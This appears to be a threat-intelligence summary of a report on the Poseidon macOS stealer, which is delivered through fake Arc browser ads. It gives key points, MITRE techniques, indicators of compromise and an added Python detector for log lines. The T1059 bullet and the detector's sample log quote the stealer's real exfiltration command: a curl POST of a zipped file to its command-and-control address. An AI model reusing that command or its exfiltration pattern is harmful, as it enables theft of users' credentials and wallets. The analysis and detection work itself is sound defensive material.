‘Poseidon’ Mac stealer distributed through Google ads

Poseidon is a macOS stealer campaign distributed through malvertising that lures Mac users with fake Arc browser downloads via malicious Google ads. The Poseidon project is an evolution/rebranding of Atomic Stealer/OSX.RodStealer by threat actor Rodrigo4, adding features such as VPN configuration theft; stolen data is exfiltrated over HTTP to a C2 panel at 79.137.192[.]4/p2p. #PoseidonMacStealer #AtomicStealer #OSXRodStealer #Rodrigo4 #ArcBrowser

Keypoints

  • Poseidon is a macOS stealer campaign dropped via malicious Google ads promoting the Arc browser, signaling continued use of Arc as a lure.
  • The Poseidon project is an evolution/rebranding of Atomic Stealer/OSX.RodStealer by threat actor Rodrigo4, with added features like VPN configuration theft.
  • The campaign uses malvertising: clicks lead to a fake Arc Mac site (arc-download[.]com) and a DMG installer that requires a right-click to bypass protections.
  • Poseidon’s capabilities include a file grabber, crypto wallet data, password manager theft (Bitwarden, KeePassXC), and browser data collection.
  • Data exfiltration is performed via a curl POST to an IP address, and a Poseidon panel is hosted at 79.137.192[.]4/p2p for control/monitoring.
  • Concrete IOCs include arcthost[.]org (malicious ad domain), arc-download[.]com (decoy site), zestyahhdog[.]com/Arc12645413[.]dmg (download URL), a SHA256 hash, and the C2 address.
  • Malwarebytes notes the campaign will be detected as OSX.RodStealer and recommends web protections like Malwarebytes Browser Guard to block ads and malicious sites.

MITRE Techniques

  • [T1189] Drive-by Compromise – Malicious ads deliver the Mac stealer, leveraging Google ads to lure victims. “On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser.”
  • [T1555.003] Credentials in Password Stores – Theft of credentials from password managers. “The stealer offers functionalities reminiscent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer…”
  • [T1005] Data from Local System – Data collection via a file grabber as part of the stealer’s feature set. “The stealer offers functionalities reminiscent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer…”
  • [T1059] Command and Scripting Interpreter – Use of a shell command (curl invoked from AppleScript) to exfiltrate data. “set result_send to (do shell script "curl -X POST -H \"uuid: 399122bdb9844f7d934631745e22bd06\" -H \"user: H1N1_Group\" -H \"buildid: id777\" --data-binary @/tmp/out.zip http://79.137.192[.]4/p2p")”
  • [T1071.001] Web Protocols – Data exfiltration over HTTP to a C2 address. “http://79.137.192[.]4/p2p” (used in the exfil command)
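As an added detection example (not code from the Malwarebytes post), the following Python flags the exfiltration pattern quoted in the T1059/T1071 bullets above in two constructed log sources: a key=value proxy log and a process-execution log. The log format, sample lines and function names are assumptions; the C2 address and header names come from the page.

```python
"""Detect the Poseidon curl exfil pattern in proxy and process logs.
Log format and sample lines are constructed for this example."""
import re
from urllib.parse import urlsplit

# Values from the page: the C2 host (written defanged in the IOC list) and
# the custom request headers the stealer's curl command sets.
POSEIDON_C2_HOST = "79.137.192.4"
POSEIDON_HEADERS = {"uuid", "user", "buildid"}

# Constructed samples: a key=value proxy log and a process-execution log.
SAMPLE_PROXY_LOG = [
    'ts=2024-06-24T10:00:01Z src=10.0.0.5 method=POST url=http://79.137.192.4/p2p headers="uuid,user,buildid" ua=curl/8.4.0',
    'ts=2024-06-24T10:00:02Z src=10.0.0.6 method=GET url=https://arc.net/download headers="accept" ua=Mozilla/5.0',
    'ts=2024-06-24T10:00:03Z src=10.0.0.7 method=POST url=https://api.example.com/p2p headers="uuid,user,buildid,content-type" ua=curl/8.4.0',
]
SAMPLE_PROC_LOG = [
    'ts=2024-06-24T10:00:01Z user=alice proc=osascript cmd="curl -X POST -H \\"uuid: 399122bdb9844f7d934631745e22bd06\\" -H \\"user: H1N1_Group\\" -H \\"buildid: id777\\" --data-binary @/tmp/out.zip http://79.137.192.4/p2p"',
    'ts=2024-06-24T10:00:05Z user=bob proc=bash cmd="curl -sL https://example.com/file.txt -o /tmp/file.txt"',
]

_PROXY_RE = re.compile(r'method=(?P<method>\S+) url=(?P<url>\S+) headers="(?P<headers>[^"]*)"')
_CMD_RE = re.compile(r'cmd="(?P<cmd>(?:[^"\\]|\\.)*)"')  # cmd value with \" escapes

def classify_proxy_line(line):
    """Return a verdict for one proxy-log line, or None if it is benign."""
    m = _PROXY_RE.search(line)
    if not m or m["method"] != "POST":
        return None
    u = urlsplit(m["url"])
    hdrs = {h.strip().lower() for h in m["headers"].split(",")}
    if u.hostname == POSEIDON_C2_HOST and u.path == "/p2p":
        return "high: POST to known Poseidon C2 panel"
    # Same panel path and header set on a host not yet in the IOC list:
    # catches a rotated C2 while keeping the verdict lower than an exact hit.
    if u.path == "/p2p" and POSEIDON_HEADERS <= hdrs:
        return "medium: /p2p POST with Poseidon-style uuid/user/buildid headers"
    return None

def classify_proc_line(line):
    """Flag a process command line matching the stealer's curl upload."""
    m = _CMD_RE.search(line)
    if not m:
        return None
    cmd = m["cmd"].replace('\\"', '"')
    if "curl" in cmd and "--data-binary @/tmp/out.zip" in cmd and '-H "buildid:' in cmd:
        return "high: curl --data-binary upload of /tmp/out.zip with buildid header"
    return None

def scan(lines, classifier):
    """Return (timestamp field, verdict) pairs for every line the classifier flags."""
    hits = []
    for line in lines:
        verdict = classifier(line)
        if verdict:
            hits.append((line.split()[0], verdict))
    return hits
```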

Indicators of Compromise

  • [Domain] arcthost[.]org – Google ad domain used to lure Mac users
  • [Domain] arc-download[.]com – Decoy site for Arc Mac download
  • [URL] zestyahhdog[.]com/Arc12645413[.]dmg – Download URL for the payload
  • [SHA256] c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05 – Payload hash
  • [IP] 79.137.192[.]4 – Command and control / data exfiltration endpoint (Poseidon panel and curl POST target at path /p2p)

Read more: https://www.malwarebytes.com/blog/cybercrime/2024/06/poseidon-mac-stealer-distributed-via-google-ads